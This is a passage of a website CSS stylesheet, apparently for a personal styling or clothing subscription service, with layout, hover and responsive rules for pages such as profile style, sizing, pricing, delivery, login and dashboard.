background-color:rgba(242, 133, 0, 0.60); padding-top:25px; padding-bottom:25px; border-top:1px solid #e1a35a !important; } .gold_bg a.sf-button{ border-color: #222 !important; margin:10px 30px 10px 30px; color:#fff; } .gold_bg a.sf-button:hover{ border-color: #222 !important; background-color:#222 !important; } a.sf-button.gold { background-color: #b08536 !important; border: none !important; } a.sf-button.gold:hover { background-color: #fff !important; } a.sf-button.blue { background-color: #0e2334 !important; border: none !important; color: #fff !important; margin:10px 30px 10px 30px; } a.sf-button.blue:hover { background-color: #fff !important; } .area_grey{background-color: #f6f7f6; border-top: 1px solid #d1d1d1; border-bottom: 1px solid #d1d1d1; } .area_gold{ background-color:rgba(163, 106, 0, 0.8); padding-top:25px; padding-bottom:25px; border-top:1px solid #e1a35a !important; margin-bottom:0 !important; margin-top:0 !important; border-bottom:none; } img.line{ margin-top:20px; } #top-header .th-right > nav .menu li a{ font-size: 13px; color: #000; font-weight: normal;} #top-header .th-right > nav .menu li a:hover{ font-size: 13px; color: #b08536 !important;} #top-header .th-right > nav .menu li a.get_started_link{ font-weight: bold;} .box_options{ border:1px solid #e3e3e3; float:left; width:100%; margin-top:-6px; position:relative; } .box_option{ margin-bottom:0; text-align:center; text-transform:uppercase; color:#000; font-family:proxbold; padding:20px; min-height:60px; font-size:13px; border-right:1px solid #e3e3e3; } .box_option:hover{ margin-bottom:0; text-align:center; text-transform:uppercase; color:#000; font-family:proxbold; padding:20px; } .box_option:hover{ background: rgba(176, 133, 54, 0.75); -webkit-transition:background-color 0.3s ease-out, color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out, color 0.3s ease-out; -o-transition:background-color 0.3s ease-out, color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out, color 0.3s ease-out; transition:background-color 0.3s ease-out, color 0.3s ease-out; color:#fff; cursor:pointer; } .box_option.selected{ -webkit-transition:background-color 0.3s ease-out, color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out, color 0.3s ease-out; -o-transition:background-color 0.3s ease-out, color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out, color 0.3s ease-out; transition:background-color color 0.3s ease-out, 0.3s ease-out; background:url(images/tick_small.png) rgba(176, 133, 54, 0.75) no-repeat; background-position: 16%; color:#fff; } @media only screen and (max-width: 991px) { .box_option.selected{ background: rgba(176, 133, 54, 0.75); } } @media only screen and (max-width: 767px) { .box_options{ max-width:300px !important; margin:auto !important; float:none !important; } .box_option{ border-bottom:1px solid #e3e3e3; border-right: none; } .box_option.selected{ background:url(images/tick_small.png) rgba(176, 133, 54, 0.75) no-repeat; background-position: 16%; } .profile_sizing_page .box_options_wrapper{ margin:0 !important; padding: 20px 0 0 0 !important; } .profile_sizing_page .box_options_label{ text-align:center !important; font-size:30px !important; } } .fw-video-link-image { display: block;} .tp-bullets.simplebullets.round .bullet { border-radius: 0;} /*Styling for the placeholders*/ textarea::-webkit-input-placeholder { font-style: italic; font-size: 12px; font-family: georgia; color: #999; text-transform: none; text-align: center; } textarea::-moz-placeholder { /* Firefox 19+ */ font-style: italic; font-size: 12px; font-family: georgia; color: #999; text-transform: none; text-align: center; } textarea:-ms-input-placeholder { font-style: italic; font-size: 12px; font-family: georgia; color: #999; text-transform: none; text-align: center; } /*Styling for flashmessages*/ .flashmessages{ border: 2px solid #e98b8b; background-color: #fee4e5; z-index: 10; padding: 20px; margin-top: 30px; display: none; float: none;} .flashmessages .error_message { color: #E98B8B; font-family: proxregular; font-size: 20px; letter-spacing: 0; padding-bottom: 17px; margin-bottom: 25px; border-bottom: 1px solid #F8D1D1; text-shadow: 0 1px 0px #FFF2F2; } .flashmessages ul.error_fields{ color: #cc5050; font-family: proxbold; font-size: 16px; margin: 0px 20px 10px; } .flashmessages ul.error_fields li{ padding-left: 20px; background-image: url(images/error_bullet.png); background-repeat: no-repeat; background-position: 0px 7px;} .button_spacer{float:none !important; display:inline-block !important;} @media only screen and (max-width: 767px) { .button_spacer{display:none !important;} } /* -------------------------------------------- HOME PAGE -------------------------------------------- */ .home_page #top-bar, .home_page #top-header { } .home_page #top-header .th-right > nav .menu li a{ font-size: 13px; color: #fff;} .home_page #header-section:before { background: transparent; } .home_page .header-wrap { width: 100%; position: absolute; left: 0; z-index: 7; } .home_page #header-section, .home_page #header-section:before, .home_page #header .is-sticky .sticky-header, .home_page .is-sticky #header.sticky-header { -moz-box-shadow: none!important; -webkit-box-shadow: none!important; box-shadow: none!important; background: transparent!important; } .home_page #header .is-sticky .sticky-header, .home_page .is-sticky #header.sticky-header { background: transparent; transition: background 0.5s ease-in-out; -moz-transition: background 0.5s ease-in-out; -webkit-transition: background 0.5s ease-in-out; -o-transition: background 0.5s ease-in-out; -webkit-animation-fill-mode: both; -moz-animation-fill-mode: both; -o-animation-fill-mode: both; animation-fill-mode: both; } .home_page #logo img { display: none!important; } .home_page #logo { background: transparent url('images/logo-header_x2.png') no-repeat; background-size: 100%; <!--[if IE]> background: transparent url('images/logo-header_x2.png') no-repeat; background-size: 230px; <![endif]--> } .home_page #logo a { display:block; color: #fff; } .home_page nav .menu > li a { color: #fff; } .home_page nav .menu > li a:hover { color: #b08536; } .home_page #header .is-sticky .sticky-header.sticky-header-resized, .home_page .is-sticky #header.sticky-header.sticky-header-resized { background: #fff!important; -moz-box-shadow: 0 3px 5px rgba(0,0,0,.05)!important; -webkit-box-shadow: 0 3px 5px rgba(0,0,0,.05)!important; box-shadow: 0 3px 5px rgba(0,0,0,.05)!important; } .home_page .sticky-header-resized #logo img.retina { display: block!important; } .home_page .sticky-header-resized #logo h1 { color: #222!important; } .home_page .sticky-header-resized #logo a { color: #333; } .home_page .sticky-header-resized #logo { background-image: none; } .home_page .sticky-header-resized nav .menu > li a { color: #252525; } .home_page .inner-page-wrap { padding-top: 0!important; margin-top: 0px; } .home_page #header-section#header { padding: 20px 0 30px 0; } .home_page nav#main-navigation .menu > li > a{ color:#fff; padding:15px 0 12px; } .home_page #main-navigation{ margin-top:0px; } .home_page #logo a.mobile-menu-show { background:url(images/mobile_nav_icon.png) no-repeat 0 0; } .home_page #logo a.mobile-menu-show:hover { background:url(images/mobile_nav_icon.png) no-repeat -42px 0; } .home_page #copyright{ border-top: none !important; } .home_page .page_bottom_bg{ display:none; position:absolute; bottom:0; background: url(images/mainpage_bottom_bg_gradient.gif) repeat-x; background-position:bottom; height: 806px; width:100%; } .home_page .key-info { width: 90%; max-width: 450px; background-color: transparent !important; color:#fff !important; } .home_page .area1 { margin:0; border:none; padding-top: 220px; padding-bottom: 180px; } .home_page .area1 .spb_content_wrapper{ max-width:600px; margin: auto; } .home_page .area2 { margin:0; border:none; padding-top: 20px; padding-bottom: 180px; } .home_page .area2 .spb_content_wrapper{ max-width:700px; margin: auto; } .home_page .area2 .spb_content_wrapper{ max-width:700px; margin: auto; } .home_page .area2 a.sf-button{ margin-top:30px; } .home_page .area3{ margin-top: -160px; } .home_page .fullscreen-container{ height:520px !important; } .home_page .slider-wrap{ margin-bottom: 0 !important; } .home_page .spb_slider_widget{ margin-bottom: 0 !important; } /*This hides the main menu item 'get started'*/ .home_page .menu_get_started{ display: none !important; } /* -------------------------------------------- ABOUT US -------------------------------------------- */ .about_us_page .inner-page-wrap {margin-top: 0;} .about_us_page .line{ border-top: 1px solid #e3e3e3;} .about_us_page h1{letter-spacing: 3px !important; line-height: 38px !important; font-size: 30px !important;} .about_us_page h2{} .about_us_page h3{letter-spacing: 1px !important; line-height: 30px !important; font-size: 22px !important; font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; } .about_us_page .area1 { margin-top: 0 !important; padding-top: 120px; padding-bottom: 120px; } .about_us_page .area1 .spb_content_wrapper{ margin: auto; } .about_us_page .area5_left { padding-top: 0; } .about_us_page .area5_right { padding-top: 0; } .about_us_page .area6 .spb_wrapper{ padding-top: 40px; padding-bottom: 0px; max-width: 600px; margin: auto;} .about_us_page .area6 .author_name{ font-family: proxregular, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; } .about_us_page .area6 .georgia_text{color: #ffffff; font-size: 18px !important; line-height: 34px;} @media only screen and (max-width: 991px) { .about_us_page .area3_right { height: 364px; } .about_us_page .area3_right .order_a_box_wrapper{ position: absolute; height: auto; width: 750px; left:-248px; } } @media only screen and (max-width: 767px) { .about_us_page p{ text-align: center !important; } .about_us_page h2{ text-align: center !important; } .about_us_page .area5 .spb_content_wrapper{ margin: auto !important; } .about_us_page img.line{ margin-top:0 !important; text-align:center; } } /* -------------------------------------------- PRICING -------------------------------------------- */ .pricing_page .inner-page-wrap { margin-top: 0px; } .pricing_page .parallax { margin-top: 0 !important; padding-top: 120px; padding-bottom: 120px; margin-bottom: 20px; } .pricing_page .parallax p{ max-width: 600px; margin: auto; margin-bottom: 10px; } .pricing_page .area3 p{max-width: 550px; margin: auto; margin-bottom: 10px; } .pricing_page .area5 p{max-width: 550px; margin: auto; margin-bottom: 10px; } .pricing_page .area7 { margin-bottom: 0 !important; } .pricing_page .area7 p{max-width: 550px; margin: auto; margin-bottom: 10px; } @media only screen and (max-width: 991px) { .pricing_page .get_started_banner { margin-top: 0 ; border:none ;} } /* -------------------------------------------- HOW IT WORKS -------------------------------------------- */ .how_it_works_page .area4 p { max-width: 600px !important; float: none !important; margin: auto !important; } .how_it_works_page .area5_right { height: 460px; position: relative; } .how_it_works_page .area5_right .order_a_box_wrapper{ position: absolute; height: auto; width: 947px; display: block; left: -306px; top:0; } .how_it_works_page .area5_right .georgia_text1{ position: absolute; height: auto; width: 190px; left: 380px; top: 60px; text-align: right; } .how_it_works_page .area5_right .georgia_text2{ position: absolute; height: auto; width: 230px; right: 0px; top: 280px; text-align: left; } .how_it_works_page .area5_right .georgia_text3{ position: absolute; height: auto; width: 300px; right: 110px; top: 411px; text-align: left; } .how_it_works_page .inner-page-wrap{ margin-top: 0 !important; margin-bottom:0 !important; } .how_it_works_page p img.line{ margin-top:30px; } .how_it_works_page .fullscreen-container{ height:470px !important; } .how_it_works_page .slider-wrap{ margin-bottom: 20px !important; } .how_it_works_page .spb_slider_widget{ margin-bottom: 0 !important; } .how_it_works_page .slider-wrap .fw-video-link-image img { visibility: hidden !important; } @media only screen and (max-width: 991px) { .how_it_works_page .area5_right { height: 364px; } .how_it_works_page .area5_right .order_a_box_wrapper{ position: absolute; height: auto; width: 750px; left:-248px; } } @media only screen and (max-width: 767px) { .how_it_works_page p{ text-align: center !important; } .how_it_works_page h2{ text-align: center !important; } .how_it_works_page img.line{ margin-top:10px !important; text-align:center; } .how_it_works_page .area1 { margin-bottom: 0 !important; } .how_it_works_page .area5_right { display:none; } } /* -------------------------------------------- PROFILE DETAILS -------------------------------------------- */ .profile_details_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .profile_details_page h2{ margin-top: 20px !important; } /* -------------------------------------------- PROFILE STYLE -------------------------------------------- */ .profile_style_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .profile_style_page h2{ margin-top: 20px !important; } .profile_style_page .area1 .row{ margin-left:-30px; margin-right:-30px; } .profile_style_page .area1 .row .col-sm-6{ padding:0 ; margin-bottom:0 ; } .profile_style_page .area1 .row .col-sm-6{ float:left; } .profile_style_page .area1 .row .col-sm-6 .left{ float:left; } .profile_style_page .area1 .row .col-sm-6 .right{ float:right !important; } .profile_style_page .area1 .row{ margin-left:-30px; margin-right:-30px; } .profile_style_page .area1 .row .col-sm-6{ padding:0 ; margin-bottom:0 ; } .profile_style_page .area1 .row .col-sm-6 .left{ float:left; } .profile_style_page .area1 .row .grid_box{ position:relative; } .profile_style_page .area1 .row .grid_box_overlay{height:100%; width:100%; position:absolute; top:0; background-color:transparent; z-index:10; -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:none; } .profile_style_page .area1 .row .grid_box_overlay:hover{ background: rgba(176, 133, 54, 0.75); -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; cursor:pointer; } .profile_style_page .area1 .row .grid_box_overlay.selected{ -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:url(images/tick.png) rgba(176, 133, 54, 0.75) center no-repeat; } .profile_style_page .box_options_label { text-align:center; font-family:proxbold; font-size:14px; color:#000; text-transform:uppercase; padding-top:15px; padding-bottom:20px; } .profile_style_page .box_options_wrapper{ padding: 40px 20px 50px 20px; margin: -30px -20px 30px -20px; } @media only screen and (max-width: 767px) { .profile_style_page .area1 .row{ margin-left:0px; margin-right:0px; } } .profile_style_page .area2 .row{ margin-left:-30px; margin-right:-31px; } .profile_style_page .area2 .row .col-sm-6{ padding:0 ; margin-bottom:0 ; float:left; } .profile_style_page .area2 .row .col-sm-6 .left{ float:left; } .profile_style_page .area2 .row .col-sm-6 .right{ float:right !important; } .profile_style_page .area2 .row .grid_box{ position:relative; border-right:1px solid #e3e3e3; border-bottom:1px solid #e3e3e3; } .profile_style_page .area2 .row .grid_box_overlay{ height:100%; width:100%; position:absolute; top:0; background-color:transparent; z-index:10; -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:none; } .profile_style_page .area2 .row .grid_box_overlay:hover{ background: rgba(176, 133, 54, 0.75); -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; cursor:pointer; } .profile_style_page .area2 .row .grid_box_overlay.selected{ -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:url(images/tick.png) rgba(176, 133, 54, 0.75) center no-repeat; } @media only screen and (max-width: 767px) { .profile_style_page .area2 .row{ margin-left:0px; margin-right:0px; } .profile_style_page .area2 .row .grid_box{ position:relative; border:none; } } .profile_style_page .row .col-sm-11{ margin: auto; float: none; clear:both; } .profile_style_page .option_image{ position:relative; } .profile_style_page .option_image_label{ position:absolute; left:15px; right:15px; bottom:30px; color:#fff; text-align:center; font-family:proxbold; font-size:18px; letter-spacing: 1px; text-transform:uppercase; z-index: 11; } .profile_style_page .area7 .option_image_overlay.selected{ background:url(images/tick_medium.png) rgba(176, 133, 54, 0.75) center no-repeat; } .profile_style_page .area7 .option_image_label{ font-size:12px; } .profile_style_page .area9 .option_image_label,.profile_style_page .area10 .option_image_label{ color:#000; } .profile_style_page .option_image_overlay{ height:100%; position:absolute; top:0; left:15px; right:15px; background-color:transparent; z-index:10; -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:none; } .profile_style_page .option_image_overlay:hover{ background: rgba(176, 133, 54, 0.75); -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; cursor:pointer; } .profile_style_page .option_image_overlay:hover>.option_image_label{ bottom: 20%; color: #000; -webkit-transition: 0.3s ease-out; -moz-transition: 0.3s ease-out; -o-transition: 0.3s ease-out; -ms-transition: 0.3s ease-out; transition: 0.3s ease-out; cursor:pointer; } .profile_style_page .option_image_overlay.selected>.option_image_label{ bottom: 20%; color: #fff; cursor:pointer; } .profile_style_page .option_image_overlay.selected{ -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:url(images/tick.png) rgba(176, 133, 54, 0.75) center no-repeat; } @media only screen and (max-width: 767px) { .profile_style_page .option_image_label{ font-size:14px !important; } .profile_style_page .option_image_overlay.selected>.option_image_label{ font-size:14px !important; display:none !important; } .profile_style_page .option_image_overlay.selected{ background:url(images/tick_medium.png) rgba(176, 133, 54, 0.75) center no-repeat; } .profile_style_page .title-forms .row{ margin-left:0; margin-right:0; } } /* -------------------------------------------- PROFILE PREFERENCES -------------------------------------------- */ .profile_preferences_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .profile_preferences_page h2{ margin-top: 20px !important; } .profile_preferences_page .area1 .row{ margin-left:-30px; margin-right:-30px; } .profile_preferences_page .area1 .row .col-sm-6{ padding:0 ; margin-bottom:0 ; } .profile_preferences_page .area1 .row .col-sm-6{ float:left; } .profile_preferences_page .area1 .row .col-sm-6 .left{ float:left; } .profile_preferences_page .area1 .row .col-sm-6 .right{ float:right !important; } .profile_preferences_page .area1 .row{ margin-left:-30px; margin-right:-30px; } .profile_preferences_page .area1 .row .col-sm-6{ padding:0 ; margin-bottom:0 ; } .profile_preferences_page .area1 .row .col-sm-6 .left{ float:left; } .profile_preferences_page .area1 .row .grid_box{ position:relative; } .profile_preferences_page .area1 .row .grid_box_overlay{height:100%; width:100%; position:absolute; top:0; background-color:transparent; z-index:10; -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:none; } .profile_preferences_page .area1 .row .grid_box_overlay:hover{ background: rgba(176, 133, 54, 0.75); -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; cursor:pointer; } .profile_preferences_page .area1 .row .grid_box_overlay.selected{ -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:url(images/tick.png) rgba(176, 133, 54, 0.75) center no-repeat; } .profile_preferences_page .box_options_label { text-align:center; font-family:proxbold; font-size:14px; color:#000; text-transform:uppercase; padding-top:15px; padding-bottom:20px; } .profile_preferences_page .box_options_wrapper{ padding: 40px 20px 50px 20px; margin: -30px -20px 30px -20px; } @media only screen and (max-width: 767px) { .profile_preferences_page .area1 .row{ margin-left:0px; margin-right:0px; } } .profile_preferences_page .area2 .row{ margin-left:-30px; margin-right:-31px; } .profile_preferences_page .area2 .row .col-sm-6{ padding:0 ; margin-bottom:0 ; float:left; } .profile_preferences_page .area2 .row .col-sm-6 .left{ float:left; } .profile_preferences_page .area2 .row .col-sm-6 .right{ float:right !important; } .profile_preferences_page .area2 .row .grid_box{ position:relative; border-right:1px solid #e3e3e3; border-bottom:1px solid #e3e3e3; } .profile_preferences_page .area2 .row .grid_box_overlay{ height:100%; width:100%; position:absolute; top:0; background-color:transparent; z-index:10; -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:none; } .profile_preferences_page .area2 .row .grid_box_overlay:hover{ background: rgba(176, 133, 54, 0.75); -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; cursor:pointer; } .profile_preferences_page .area2 .row .grid_box_overlay.selected{ -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:url(images/tick.png) rgba(176, 133, 54, 0.75) center no-repeat; } @media only screen and (max-width: 767px) { .profile_preferences_page .area2 .row{ margin-left:0px; margin-right:0px; } .profile_preferences_page .area2 .row .grid_box{ position:relative; border:none; } } .profile_preferences_page .row .col-sm-11{ margin: auto; float: none; clear:both; } .profile_preferences_page .option_image{ position:relative; } .profile_preferences_page .option_image_label{ position:absolute; left:15px; right:15px; bottom:30px; color:#fff; text-align:center; font-family:proxbold; font-size:18px; letter-spacing: 1px; text-transform:uppercase; z-index: 11; } .profile_preferences_page .area7 .option_image_overlay.selected{ background:url(images/tick_medium.png) rgba(176, 133, 54, 0.75) center no-repeat; } .profile_preferences_page .area7 .option_image_label{ font-size:12px; } .profile_preferences_page .area9 .option_image_label,.profile_preferences_page .area10 .option_image_label{ color:#000; } .profile_preferences_page .option_image_overlay{ height:100%; position:absolute; top:0; left:15px; right:15px; background-color:transparent; z-index:10; -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:none; } .profile_preferences_page .option_image_overlay:hover{ background: rgba(176, 133, 54, 0.75); -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; cursor:pointer; } .profile_preferences_page .option_image_overlay:hover>.option_image_label{ bottom: 20%; color: #fff; -webkit-transition: 0.3s ease-out; -moz-transition: 0.3s ease-out; -o-transition: 0.3s ease-out; -ms-transition: 0.3s ease-out; transition: 0.3s ease-out; cursor:pointer; } .profile_preferences_page .option_image_overlay.selected>.option_image_label{ bottom: 20%; color: #fff; cursor:pointer; } .profile_preferences_page .option_image_overlay.selected{ -webkit-transition:background-color 0.3s ease-out; -moz-transition:background-color 0.3s ease-out; -o-transition:background-color 0.3s ease-out; -ms-transition:background-color 0.3s ease-out; transition:background-color 0.3s ease-out; background:url(images/tick.png) rgba(176, 133, 54, 0.75) center no-repeat; } @media only screen and (max-width: 767px) { .profile_preferences_page .option_image_label{ font-size:14px !important; } .profile_preferences_page .option_image_overlay.selected>.option_image_label{ font-size:14px !important; display:none !important; } .profile_preferences_page .option_image_overlay.selected{ background:url(images/tick_medium.png) rgba(176, 133, 54, 0.75) center no-repeat; } .profile_preferences_page .title-forms .row{ margin-left:0; margin-right:0; } } /* -------------------------------------------- PROFILE SIZING -------------------------------------------- */ .profile_sizing_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .profile_sizing_page h2{ margin-top: 20px !important; } .profile_sizing_page .box_options_wrapper{ border-top:1px solid #e3e3e3; padding: 40px 20px 40px 20px; margin: -30px -30px 30px -30px; } .profile_sizing_page .box_options_label { text-align:right; font-family:proxbold; font-size:14px; color:#000; text-transform:uppercase; padding-right:25px; padding-top:15px; } /* -------------------------------------------- PROFILE PRICE -------------------------------------------- */ .profile_pricing_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .profile_pricing_page h2{ margin-top: 20px !important; } .promo_code_wrapper{ float:none; margin:auto; background: url(images/promo_code_bg.png) repeat-x; min-height:166px; } .promo_code{ width: 90%; max-width: 445px; height: 55px; border: 1px solid #cccdcc; font: 14px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; text-align: left; display: block; padding: 10px 10px 10px 20px !important; margin: 50px auto 8px auto; color: #525252; border-radius: 0px; -webkit-appearance: none; background: url(images/arrow-down.png) 95% center no-repeat; letter-spacing: 1px; text-transform: uppercase; } /* -------------------------------------------- PROFILE DELIVERY -------------------------------------------- */ .profile_delivery_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .profile_delivery_page h2{ margin-top: 20px !important; } .profile_delivery_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; } /* -------------------------------------------- LOGIN -------------------------------------------- */ .login_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .login_page h2{ margin-top: 50px !important; } .login_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; float: left; } .login_page .login_wrapper{ } .login_page .key-info{ clear:both; display: block; margin:0 auto; float: none; margin-bottom: 20px; } .login_page .button4{ clear:both; display: block; margin:0 auto; float: none; margin-bottom: 50px; margin-top: 100px; max-width: 250px; } .login_page .lost_password{ clear:both; display: block; text-align: center; } .login_page .georgia_text{ font-size: 22px !important; display:block; height:40px; width:100%; padding:0; float:left !important; text-align:center; margin: 90px 0 20px 0 !important; } @media only screen and (max-width: 767px) { } /* -------------------------------------------- LOGIN -------------------------------------------- */ .lost_password_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .lost_password_page h2{ margin-top: 50px !important; } .lost_password_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; float: left; min-height: 500px; } .lost_password_page .lost_password_wrapper{ } .lost_password_page .key-info{ clear:both; display: block; margin:0 auto; float: none; margin-bottom: 20px; } .lost_password_page .button4{ clear:both; display: block; margin:0 auto; float: none; margin-bottom: 50px; margin-top: 100px; max-width: 250px; } .lost_password_page .lost_password{ clear:both; display: block; text-align: center; } .lost_password_page .georgia_text{ font-size: 22px !important; display:block; height:40px; width:100%; padding:0; float:left !important; text-align:center; margin: 90px 0 20px 0 !important; } @media only screen and (max-width: 767px) { } /* -------------------------------------------- PROFILE AUTHORIZE -------------------------------------------- */ .profile_authorize_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .profile_authorize_page h2{ margin-top: 20px !important; } .profile_authorize_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; } .profile_authorize_page .payment_info_wrapper{ float: left !important; padding-top: 80px; padding-bottom: 50px; margin: auto; margin-bottom:80px; } .profile_authorize_page .payment_info img{background: url(images/payment_dot.png) no-repeat; background-position:right; } .profile_authorize_page .payment_info h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; } @media only screen and (max-width: 767px) { .profile_authorize_page .payment_info img{background:none !important; } .profile_authorize_page .payment_info {padding-bottom:40px; text-align:center; background: url(images/payment_dot.png) no-repeat; background-position: center bottom; } } /* -------------------------------------------- DASHBOARD -------------------------------------------- */ .dashboard_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .dashboard_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; min-height: 500px; } .dashboard_page h2{ margin-top: 50px !important; } .dashboard_page h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 13px !important; letter-spacing: 0 !important; } .dashboard_page .dashboard_wrapper{ float: left !important; padding-top: 80px; margin: auto; position: relative; border-top: 1px solid #e3e3e3; margin-bottom:50px; padding-bottom: 0px; float: none !important; position: relative; } .dashboard_page .dashboard_wrapper h2{ margin-top: 0px !important; margin-bottom: 30px; } .dashboard_page .dashboard_wrapper h1 { letter-spacing: 3px !important; line-height: 38px !important; font-size: 30px !important; } .dashboard_page .dashboard_wrapper p { font-size: 14px; color: #000; text-transform: uppercase; padding-top: 20px; padding-bottom: 20%; letter-spacing: 0; text-align: center; } .dashboard_page .georgia_text{ font-size: 18px !important; padding-top: 50px; padding-bottom: 30px; text-align: center; } .dashboard_page .dashboard_info { border:1px solid #e3e3e3; cursor: pointer;} .dashboard_page .dashboard_info:hover>.dashboard_icon { background-position: 0 -96px !important;} .dashboard_page .dashboard_info:hover>h3 { color: #b08536 !important; } .dashboard_page .dashboard_info h3{ margin-bottom: 30px;} .dashboard_page .dashboard_info .dashboard_icon{ margin: 0 auto; margin-top:50px; height:96px; width:118px; } .dashboard_page .dashboard_info.edit_profile .dashboard_icon{ background: url(images/icon_profile.png) no-repeat; } .dashboard_page .dashboard_info.edit_style .dashboard_icon{ background: url(images/icon_style.png) no-repeat; } .dashboard_page .dashboard_info.edit_sizes .dashboard_icon{ background: url(images/icon_sizes.png) no-repeat; } .dashboard_page .dashboard_info.edit_prices .dashboard_icon{ background: url(images/icon_prices.png) no-repeat; } .dashboard_page .dashboard_info.edit_delivery .dashboard_icon{ background: url(images/icon_delivery.png) no-repeat; } .dashboard_page .dashboard_info.edit_collection .dashboard_icon{ background: url(images/icon_collection.png) no-repeat; } .dashboard_page .dashboard_info.physical { border:1px solid #e3e3e3 !important; border-right: none !important; border-left: none !important; } @media only screen and (max-width: 991px) { .dashboard_page .dashboard_info { max-height: 220px;} } @media only screen and (max-width: 767px) { .dashboard_page .dashboard_info{ margin-bottom: 0 !important; width: 100%; float: left; max-height: none; border:1px solid #e3e3e3 ; border-bottom: none; } .dashboard_page .dashboard_info.edit_collection { border-bottom:1px solid #e3e3e3 !important; } } /* -------------------------------------------- THANK YOU -------------------------------------------- */ .thankyou_page #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff; } .thankyou_page .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; max-width: 970px; min-height: 600px; } .thankyou_page .styles-block h1{ margin-top: 50px !important; } .thankyou_page h2{ margin-top: 50px !important; } .thankyou_page h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 18px !important; } .thankyou_page .georgia_text{ font-size: 18px !important; padding-top: 40px; padding-bottom: 30px; text-align: center; } /* -------------------------------------------- SORRY PAGE -------------------------------------------- */ .page-id-926 #main-container{ background: url(images/top-banner-section.png) no-repeat center 0px #fff;} .page-id-926 .styles-block{ margin-top: 50px; border-top:1px solid #e3e3e3; max-width: 970px; min-height: 600px; } .page-id-926 .styles-block h1{ margin-top: 50px !important;} .page-id-926 h2{ margin-top: 50px !important;} .page-id-926 h3{font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; font-size: 18px !important;} .page-id-926 .georgia_text{ font-size: 18px !important; padding-top: 40px; 